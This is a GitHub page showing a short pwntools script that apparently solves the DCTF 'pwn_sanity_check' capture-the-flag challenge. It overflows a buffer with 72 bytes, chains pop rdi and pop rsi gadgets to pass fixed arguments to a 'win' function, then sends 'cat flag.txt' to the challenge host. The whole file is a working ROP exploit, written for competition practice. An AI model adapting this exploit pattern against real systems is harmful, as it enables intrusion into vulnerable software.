-
Notifications
You must be signed in to change notification settings - Fork 23
/
Copy pathexploit.py
41 lines (34 loc) · 1022 Bytes
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!/usr/bin/env python3
import pwn
host = "dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io"
port = 7480
target = "pwn_sanity_check"
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address)
pop_rsi = pwn.p64(rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address)
print(pop_rdi)
print(pop_rsi)
payload = b"A"*72
payload += pop_rdi
payload += pwn.p64(0xdeadbeef)
payload += pop_rsi
payload += pwn.p64(0x1337c0de)
payload += pwn.p64(0x1337c0de)
payload += pwn.p64(elf.sym['win'])
print(payload, len(payload))
pr.sendafter("joke\n", payload)
pr.sendline()
pr.sendline("cat flag.txt")
print(pr.readall(2))
except Exception as e:
print(e)
finally:
pr.close()
exploit(True)